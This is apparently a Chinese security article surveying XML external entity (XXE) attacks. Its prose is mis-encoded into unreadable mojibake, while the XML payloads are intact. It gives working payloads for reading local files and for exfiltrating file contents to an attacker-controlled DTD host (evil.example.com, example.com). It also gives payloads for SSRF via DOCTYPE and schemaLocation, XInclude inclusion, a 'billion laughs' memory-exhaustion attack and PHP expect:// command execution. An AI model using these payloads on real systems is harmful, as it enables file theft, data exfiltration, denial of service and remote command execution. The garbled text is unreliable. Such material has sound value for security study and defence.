XML¿ÉÀ©Õ¹±ê¼ÇÓïÑÔ£¬±»Éè¼ÆÓÃÀ´´«ÊäºÍ´æ´¢Êý¾Ý£¬ÆäÐÎʽ¶àÑù¡£Ä³Ð©ÔÚXMLÖб»Éè¼Æ³öÀ´µÄÌØÐÔ£¬±ÈÈç
XML schemas(×ñÑXML Schemas ¹æ·¶)ºÍdocuments type definitions(DTDs)¶¼Êǰ²È«ÎÊÌâÀ´Ô´¡£×ÝÈ»±»¹«¿ªµÄÌÖÂÛÁËÉÏÊ®Ä꣬»¹ÊÇÓÐÒ»´óÅúÒ»´óÅúµÄÈí¼þËÀÔÚÕë¶ÔXMLµÄ¹¥»÷ÉÏ¡£
0x00 XML¼ò½é
XML¿ÉÀ©Õ¹±ê¼ÇÓïÑÔ£¬±»Éè¼ÆÓÃÀ´´«ÊäºÍ´æ´¢Êý¾Ý¡£ÆäÐÎʽ¶àÑù
ÀýÈ磺
1.Îĵµ¸ñʽ(OOXML£¬ODF,PDF,RSS,DOCX...)
2.ͼƬ¸ñʽ(SVG,EXIF Headers,...)
3.ÅäÖÃÎļþ(×Ô¶¨ÒåÃû×Ö£¬Ò»°ãÊÇ.xml)
4.ÍøÂçÐÒé(WebDAV,CalDAV£¬XMLRPC,SOAP,REST,XMPP,SAML,XACML,...)
ijЩÔÚXMLÖб»Éè¼Æ³öÀ´µÄÌØÐÔ£¬±ÈÈç XML schemas(×ñÑXML
Schemas ¹æ·¶)ºÍdocuments type definitions(DTDs)¶¼Êǰ²È«ÎÊÌâÀ´Ô´¡£×ÝÈ»±»¹«¿ªµÄÌÖÂÛÁËÉÏÊ®Ä꣬»¹ÊÇÓÐÒ»´óÅúÒ»´óÅúµÄÈí¼þËÀÔÚÕë¶ÔXMLµÄ¹¥»÷ÉÏ¡£

ÆäʵXMLʵÌå»úÖÆºÜºÃÀí½â£¬¿ÉÒÔÖ±½ÓÓá°×ªÒ塱À´Àí½â£º%ºÍ&foo´ÓÔʼÒâÒåÉÏÀ´ËµÊÇÒ»ÑùµÄ£¬Ö»ÊǺóÕßÊÇÓÉÎÒÃÇ×Ô¼ºÀ´¶¨ÒåÈÎÒâÄÚÈÝ¡£
ÄÃDTDÀ´Ëµ£¬DTDÖÐÄÜÉùÃ÷ʵÌåÀ´¶¨Òå±äÁ¿(»òÊÇÎÄ×ÖÀàµÄºê)£¬ÒÔ±ãÔÚ½ÓÏÂÀ´µÄDTD»òÕßXMLÎĵµÖÐʹÓá£Ò»°ãʵÌåÔÚDTDÖж¨Ò壬ÓÃÀ´·ÃÎÊÄÚ²¿×ÊÔ´£¬»ñÈ¡ÀïÃæµÄÎÄ×Ö²¢ÓÃÀ´Ìæ»»×Ô¼ºµÄxmlÎĵµ£¬¶øÍⲿʵÌåÓÃÀ´·ÃÎÊÍⲿ×ÊÔ´(Ò²¾ÍÊÇ˵£¬ÕâЩ×ÊÔ´ÄÜÀ´×Ô±¾µØ¼ÆËã»ú£¬Ò²¿ÉÒÔÊÇÔ¶³ÌÖ÷»ú)¡£ÔÚ½âÎöÍⲿʵÌåµÄ¹ý³ÌÖУ¬XMLµÄ·ÖÎöÆ÷¿ÉÄÜ»áʹÓÃÖÚ¶àÍøÂçÐÒéºÍ·þÎñ(DNS,FTP,HTTP,SMBµÈµÈ)ÕâÈ¡¾öÓÚURLsÀïÃæ±»Ö¸¶¨³Éʲô¡£ÍⲿʵÌåÓÃÀ´´¦ÀíÄÇЩʵʱ¸üеÄÎĵµÊǺÜÓÐÓõģ¬È»¶ø£¬¹¥»÷Ò²ÄÜÔÚ½âÎöÍⲿʵÌåµÄ¹ý³ÌÖз¢Éú¡£¹¥»÷ÊֶΰüÀ¨£º
1.¶ÁÈ¡±¾µØÎļþ(¿ÉÄܰüº¬Ãô¸ÐÐÅÏ¢ /etc/shadow)
2.ÄÚ´æÇÖ·¸
3.ÈÎÒâ´úÂëÖ´ÐÐ
4.¾Ü¾ø·þÎñ
±¾ÎĽ«¶Ô³¤ÆÚÒÔÀ´³öÏÖµÄxml¹¥»÷·½·¨½øÐÐÒ»¸ö×ܽᡣ
0x01 ³õʶXMLÍⲿʵÌå¹¥»÷
»ùÓÚÍⲿʵÌåµÄÎļþ°üº¬
×îÔç±»Ìá³öµÄXML¹¥»÷·½·¨ÊÇÀûÓÃÍⲿʵÌåµÄÒýÓù¦ÄÜÀ´ÊµÏÖÈÎÒâÎļþ¶ÁÈ¡
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE updateProfile [ <!ENTITY file SYSTEM "file:///c:/windows/win.ini"> ]> <updateProfile> <firstname>Joe</firstname> <lastname>&file;</lastname> ... </updateProfile> |
È»¶øÕâÖÖ¶ÁÈ¡ÊÇÓÐÏÞÖÆµÄ£¬ÒòΪxmlµÄ½âÎöÆ÷ÒªÇó±»ÒýÓõÄÊý¾ÝÊÇÍêÕûµÄ£¬ÎÒÃÇʹÓÃÒ»¸öÀý×ÓÀ´½âÊÍʲôÊÇÍêÕû¡£
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE simpleDocument [ <!ENTITY first "<my"> <!ENTITY second "tag/>"> ]> <simpleDocument>&first;&second;</simpleDocument> |
ÈçÉϵÄxmlÎĵµµ±·¢Ë͸ø·þÎñÆ÷ʱ£¬Êµ¼ÊÉÏÊÇ»á²úÉúÒ»¸ö´íÎóµÄ ÆäÖÐËäÈ»ÔÚ×éºÏÔÚÒ»ÆðʱÊÇÄܹ»ÍêÃÀ±ÕºÏµÄ£¬µ«ÊÇÕâЩʵÌåÓÉÓÚÔÚµÚ3£¬4Ðоͱ»½âÎöÒ»´Î£¬´ËʱÓÉÓÚ²»ÊÇÍêÃÀ±ÕºÏµÄ£¬¾Í»áÅ׳öÒ»¸ö´íÎó¡£
ÕâÖÖ´íÎóÈÃxml¹¥»÷Ò»¶È±äµÃ¼¦À߯ðÀ´£¬ÒòΪʵ¼ÊÉϺܶàÎļþ¶¼ÊÇ¡°Î´±ÕºÏÐÎʽ¡±µÄ£¬±ÈÈçÔÚphpÎļþÍÆ¼öµÄд·¨ÖоÍÊÇÖ»ÓÐÇ°ÃæÒ»¸ö"
¸üÔã¸âµÄÊÇ£¬µ±ÄãÑ¡Ôñ°üº¬µÄÊÇÒ»¸öÍêÕûµÄxmlÎļþ(±ÈÈçÊý¾Ý¿âÁ¬½ÓÎļþ)µÄʱºò£¬·µ»Ø½á¹û½«ÊÇ

¿ÉÒÔ¿´µ½£¬ÔÚ±êÇ©ÖеÄÊý¾Ý¿âÅäÖÃÎĵµ±»Ç¶Èëʱ£¬´ó²¿·ÖÄÚÈݶ¼ÊÇÊ¡ÂԺţ¬Ö»ÏÔʾÁËÎĵµµÄ½á¹¹¡£ÕâÊÇÓÉxml parserÌØÐÔ¾ö¶¨µÄ¡£
URL Invocation
XML¹¥»÷ÖÐÓÐÒ»¿é³£³£±»ºöÊÓ£¬ÄǾÍÊÇÀûÓÃURL»úÖÆÒÔ¼°ËûÃǵÄÒ»Ð©Ææ¹ÖµÄÌØÐÔÀ´À©´ó¹¥»÷Ãæ¡£
ËäÈ»XML¹æ·¶²¢Ã»ÓÐÒªÇóÖ§³ÖÈκÎÌØ¶¨µÄURL»úÖÆ£¬µ«Ðí¶àƽ̨µÄµ×²ãÍøÂç¿âÈ´Ö§³ÖÁ˼¸ºõËùÓÐURL»úÖÆ¡£
½èÖúURLs£¬¹¥»÷Õß¿ÉÒÔÈÃÔËÐÐ×ÅXMLparserµÄÖ÷»úÏòµÚÈý·½Ö÷»ú·¢Æð¶ñÒâÇëÇó.
±ÈÈç¡°server-side request forgery¡±(ssrf).ÀíÂÛÉÏÀ´Ëµ£¬URL InvocationÉõÖÁ¿ÉÒÔÓÃÀ´·¢ÆðÄÚ²¿ÍøÂçÖеĺéË®¹¥»÷¡£

´ó²¿·ÖÈ˲»ÖªµÀµÄÊÇ£¬¼´Ê¹ÍⲿʵÌå±»½ûÓÃÁË£¬Ðí¶àxml parsers»¹ÊÇ»áÈ¥½âÎöÄÇЩURL¡£¾Ù¸öÀý×Ó£¬Ò»Ð©parsers»áÔÚÎĵµ¶¨Òå½×¶Î¶Ôurl·¢ÆðÇëÇó
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" "http://internal/service?ssrf"> <roottag>Õâ²»ÊÇʵÌå¹¥»÷£¡</roottag> |
³ýÁËÍⲿʵÌåºÍ»ùÓÚDOCTYPEµÄSSRF¹¥»÷Ö®Í⣬XML SchemaÌṩÁËÁ½¸öÔÚʵÀýÎĵµÖÐʹÓõÄÌØÊâÊôÐÔ£¬ÓÃÓÚÖ¸³öģʽÎĵµµÄλÖá£ÕâÁ½¸öÊôÐÔÊÇ£ºxsi:schemaLocationºÍxsi:noNamespaceSchemaLocation£¬Ç°ÕßÓÃÓÚÉùÃ÷ÁËÄ¿±êÃû³Æ¿Õ¼äµÄģʽÎĵµ£¬ºóÕßÓÃÓÚûÓÐÄ¿±êÃû³Æ¿Õ¼äµÄģʽÎĵµ£¬ËüÃÇͨ³£ÔÚʵÀýÎĵµÖÐʹÓá£
<roottag xmlns="http://schema/namespace/primary" xmlns:secondaryns="http://schema/namespace/secondary" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://schema/namespace/primary <p> <secondaryns:s> ... </secondaryns:s> </p> </roottag> http://location/of/remote/schema/primary.xsd http://schema/namespace/secondary http://location/of/remote/schema/secondary.xsd"> |
ÔÚÕâ¸ö°¸ÀýÖУ¬ËùÓдøÓÐsecondaryns:ǰ׺µÄ¶¼»á×ñÑÔÚxmlns:secondarynsÖж¨ÒåµÄ»úÖÆ¡£ÓÉÓÚDOCTYPE¶¨Òå²»ÄܳöÏÖÔÚÎĵµµÄÖв¿£¬ËùÒÔµ±ÎÒÃÇÖ»¶ÔÎĵµÄ³¸ö²¿·Ö¿É¿ØµÄʱºò£¬¾ÍÄÜÀûÓÃschema_Location(http://location/of/remote/schema/primary.xsd)·¢Æðssrf¡£(ǰÌáÊÇһЩÉèÖÃÐèÒªÉèÖÃΪon£¬È»¶øÎÒÃDz¢Ã»ÓжÔÿ¸öxml
parser½øÐгä·ÖµÄ²âÊÔÀ´Ñо¿²»Í¬»·¾³ÏÂÓÐʲôҪÇóÄÜÈÃÎÒÃǽøÐÐssrf¹¥»÷£¬ËùÒÔÕâÒ²ÊÇÒ»¸ö´ýÑо¿µÄ·½Ïò£¬ÓÐÐËȤµÄwooyuner¿ÉÒÔ½»Á÷~)
0x02 ÒýÈë²ÎÊýʵÌåºóµÄ¹¥»÷ÊÖ¶Î
µ±ÎÒÃǵĶñÒâxml±»³É¹¦½âÎö£¬ÕâʱÎÒÃÇÓпÉÄÜÃæÁÙÁ½¸öÎÊÌ⣺
Ò»£¬Êý¾Ýδ±ÕºÏµ¼ÖÂǶÈëʧ°Ü(±ÈÈçÖ»´æÔÚ
¶þ£¬·þÎñÆ÷½øÐÐÏÞÖÆµ¼ÖÂÊý¾Ý²»ÄÜ·µ»Ø¡£
ÒýÈë²ÎÊýʵÌåÖ®ºó£¬ÕâÁ½¸öÎÊÌâ¾ÍÄܵõ½½â¾ö¡£
²ÎÊýʵÌåÒÔ%¿ªÍ· ÎÒÃÇʹÓòÎÊýʵÌåÖ»ÐèÒª×ñÑÁ½ÌõÔÔò£º
²ÎÊýʵÌåÖ»ÄÜÔÚDTDÉùÃ÷ÖÐʹÓᣠ²ÎÊýʵÌåÖв»ÄÜÔÙÒýÓòÎÊýʵÌå¡£
CDATAתÒåµÄÃîÓÃ
CDATA²¿¼þ;ÔÚCDATA²¿¼þµÄËùÓÐÄÚÈݶ¼»á±»XML½âÎöÆ÷ºöÂÔ£¬¼´CDATA²¿¼þÀïÃæµÄÄÚÈݽô½ôÕâÊÇÒ»¸ö×Ö·û´®Îı¾µÄ×÷Óá£Ò»¸ö
CDATA ²¿¼þÒÔ""±ê¼Ç½áÊø¡£ÄÇôÎÒÃÇÄܲ»Äܹ¹ÔìÒ»¸öÕâÑùµÄÒ³ÃæÀ´·µ»ØÄÇЩÎļþÄØ
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag [ <!ENTITY % start "<![CDATA["> <!ENTITY % goodies SYSTEM "file:///etc/fstab"> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "http://evil.example.com/combine.dtd"> %dtd; ]> <roottag>&all;</roottag> |
combine.dtdÈçÏÂ
<?xml version="1.0" encoding="UTF-8"?> <!ENTITY all "%start;%goodies;%end;"> |
Ç°ÃæÒ²Ìáµ½¹ý£¬µ±xml parsers»á°ÑxmlµÄ²ÎÊýʵÌå% start % endÂíÉϽâÊÍ£¬ÓÉÓÚûÓбպÏ
¾Í»áÅ׳ö´íÎó£¬ÄÇôÕâÀïµÄ%startΪºÎÄÜÕý³£µØ½âÎöÄØ? ÕâÊÇÒòΪ²ÎÊýʵÌåµÄÒýÓò»ÐèÒªÔÚxmlÎĵµ½âÎöµÄʱºò±£³Öxml±ÕºÏ£¬ÕâÑù¾ÍÈÆ¹ýÁËÏÞÖÆ¡£
ͨ¹ýÕâÑùÎÒÃǾÍÄܶÁÈ¡ËùÓÐÊý¾ÝÁË(base64±àÂëÒ²¿É)
Íâ´øÊý¾Ýbypass»ØÏÔÏÞÖÆ
ÁíÒ»ÖÖʹÓòÎÊýʵÌåµÄÊֶξÍÊÇÍâ´øÊý¾ÝÁË¡£
ÀûÓòÎÊýʵÌ壬ÎÒÃÇÄܹ»°ÑÐèÒª¶ÁÈ¡µÄÎļþͨ¹ýһЩÐÒé(http ftpµÈ)·¢Ë͵½ÎÒÃǵķþÎñÆ÷ÉÏ£¬ÄÇôͨ¹ýÈÕÖ¾²é¿´¾ÍÄÜ»ñÈ¡Êý¾ÝÁË
ÎÒÃÇ¿ÉÒÔÕâô¹¹Ôì
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag [ <!ENTITY % file SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % dtd SYSTEM "http://example.com/evil.dtd"> %dtd;]> <roottag>&send;</roottag> |
È»ºóÔÚÎÒÃǿɿصÄhttp://example.com/
·ÅÖÃÈçÏÂDTD
<?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://example.com/?%file;'>"> %all; |
Á÷³ÌÈçÏÂ

XXEµÄÆæÃŶݼ×
»ùÓÚXIncludeµÄÎļþ°üº¬
XIncludeÌṩÁËÒ»ÖÖ½ÏΪ·½±ãµÄÈ¡»ØÊý¾ÝµÄ˼·(ÔÙÒ²²»Óõ£ÐÄÊý¾Ý²»ÍêÕû¶øµ¼ÖÂparserÅ׳öÒ»¸ö´íÎó)¶øÎÒÃÇÄܹ»Í¨¹ýparseÊôÐÔ£¬Ç¿ÖÆÒýÓÃÎļþµÄÀàÐÍ¡£
<root xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include href="file:///etc/fstab" parse="text"/> </root> |
²»¹ýXincludeÐèÒªÊÖ¶¯¿ªÆô£¬²âÊÔ·¢ÏÖËùÓÐxml parser¶¼Ä¬ÈϹرÕÕâÒ»ÌØÐÔ¡£
¾Ü¾ø·þÎñ
XXE¹¥»÷Ò²ÄÜÓÃÀ´·¢Æð¾Ü¾ø·þÎñ¹¥»÷
ÈçϵĵݹéÒýÓ㬴ÓÏÂÖÁÉÏÒÔÖ¸ÊýÐÎʽÔö¶à
<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz> |
»ØÒäһϽâÎö¹ý³Ì£¬µ±XML´¦ÀíÆ÷ÔØÈëÕâ¸öÎĵµµÄʱºò£¬Ëü»á°üº¬¸ùÔªËØ£¬¶øÀïÃæ¶¨ÒåÁËʵÌå&lol9
£¬¶ø19ʵÌåÀ©Õ¹³ÉÁ˰üº¬ÁË¡°&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;¡±Õâ¸ö×Ö·û´®¡£
Èç´ËµÝ¹éÉÏÈ¥£¬Ñ¹ÈëÄÚ´æµÄ¶«Î÷³ÊÖ¸ÊýÔö³¤£¬ÊµÑé·¢ÏÖ£¬Ò»¸öСÓÚ1KBµÄXML¹¥»÷payloadÄÜÏûºÄ3GBµÄÄÚ´æ¡£
ÌØ¶¨»·¾³ÏµĹ¥»÷ºÍÏÞÖÆ
Java&Xerces
ĬÈϵÄOracle's Java Runtime EnvironmentϵÄXML parserÊÇXerces£¬Ò»¸öapacheµÄÏîÄ¿¡£¶øXercesºÍJavaÌṩÁËһϵÁеÄÌØÐÔ£¬ÕâÐ©ÌØÐÔÓÖÄܵ¼ÖÂһЩÑÏÖØµÄ°²È«ÎÊÌâ¡£ÉÏÊöµÄÄÇЩ¹¥»÷ÊÖ·¨(DOCTYPEs
for SSRF,Îļþ¶ÁÈ¡,²ÎÊýʵÌåµÄÍâ´øÊý¾Ý)ÔÚjavaµÄĬÈÏÅäÖÃÏÂÄܹ»ÔËÓÃ×ÔÈç,java/XercesÒ²Ö§³ÖXInclude
µ«ÊÇÐèÒªsetXIncludeAware(true) ºÍsetNamespaceAware(true)¡£
java¹æ·¶Äܹ»Ö§³ÖÈçϵÄURL»úÖÆ
ÁîÈ˳ԾªµÄÊÇJavaµÄfileÐÒéÄܹ»ÓÃÀ´ÁÐĿ¼£¬±ÈÈç˵£¬ÔÚlinuxÏÂÃæ¡°file:///¡±»áÁгö/Ŀ¼ÏÂËùÓж«Î÷£º
jarÐÒéjar:http://host/application.jar!/file/within/the/zip»áµ¼Ö·þÎñÆ÷Ê×ÏÈÈ¡µÃÎļþÈ»ºó½âѹÕâ¸öÒÔjar¿ªÍ·!½áβµÄ°ü
²¢ÌáÈ¡ºóÃæµÄÎļþ¡£´Ó¹¥»÷ÕߵĽǶȿ´£¬ÍêÈ«Äܹ»¶¨ÖÆÒ»Ð©¸ßѹËõ±ÈµÄ°ü(±ÈÈç1000£º1)ÕâЩZIPÕ¨µ¯ÄÜÓÃÀ´¹¥»÷·´²¡¶¾ÏµÍ³£¬»òÕßÓÃÀ´ÏûºÄÄ¿±ê»úµÄÓ²ÅÌ/ÄÚ´æ×ÊÔ´¡£×¢Ò⣬jar
URLsÄÜÔÚÈκνÓÊÜDOCTYPE¶¨ÒåµÄJAVA XercesϵͳÉÏʹÓá£ËùÒÔ£¬¼´Ê¹ÍⲿʵÌ幨±ÕÁË£¬»¹ÊÇÄܹ»½øÐй¥»÷¡£
php&expectµÄRCE
ºÜÒź¶£¬Õâ¸öÀ©Õ¹²¢²»ÊÇĬÈϰ²×°µÄ£¬È»¶ø°²×°ÁËÕâ¸öÀ©Õ¹µÄXXE©¶´£¬ÊÇÄܹ»Ö´ÐÐÈÎÒâÃüÁî¡£
<!DOCTYPE root[<!ENTITY cmd SYSTEM "expect://id">]> <dir> <file>&cmd;</file> </dir> |
ÄÇô¾Í»á·µ»ØÈçÏÂ
<file>uid=501(Apple) gid=20(staff) groups=20(staff),501(access_bpf), 12(everyone),61(localaccounts),79(_appserverusr),80(admin), 81(_appserveradm),98(_lpadmin),401(com.apple.sharepoint.group.1), 33(_appstore),100(_lpoperator),204(_developer), 398(com.apple.access_screensharing),399(com.apple.access_ssh)<file> |
xml×¢Èë
Õâ¸öºÍxxe¹¥»÷¹ØÏµ²¢²»´ó£¬µ«ÊDZ¾ÎÄÌÖÂÛµÄÊÇXML°²È«£¬ËùÒÔÕâ¸ö×ÔȻҲ¾ÍÊÕ¼½øÀ´
$GLOBALS["HTTP_RAW_POST_DATA"]ÔÚphpÖб»ÉèÖóÉÁË¡°²»×ªÒ塱£¬Ò»µ©³ÌÐòͨ¹ýʵÌå»ñÈ¡Êý¾Ýºó£¬Ö±½Ó´øÈëÁËMysql×îºóÔì³É×¢Èë
°¸ÀýÈçÏÂ
WooYun: PHPYUN×îаæXML×¢Èë¼°SQL×¢Èë»ñÈ¡¹ÜÀíÔ±Õ˺Å(ÎÞÊÓÈκηÀÓù)
0x03 ×ܽá
XXE¹¥»÷×ÜÔÚ±»ºöÊÓ
¿ª·¢ÕßÍùÍù˵£º
¹¥»÷ÍþвС..
¹Ø±ÕʵÌå¾ÍÄÜÍêÈ«±ÜÃâ...
XMLʵÌå¹¥»÷ÊÇɶ?
È»¶ø£¬xmlʵÌå¹¥»÷ÔÙÉÏÊöµÄ¹¥»÷ÖÐÒÑÈ»²úÉúÁ˺ܶà³öºõ¿ª·¢ÕßÒâÁϵÄÍþв¡£
|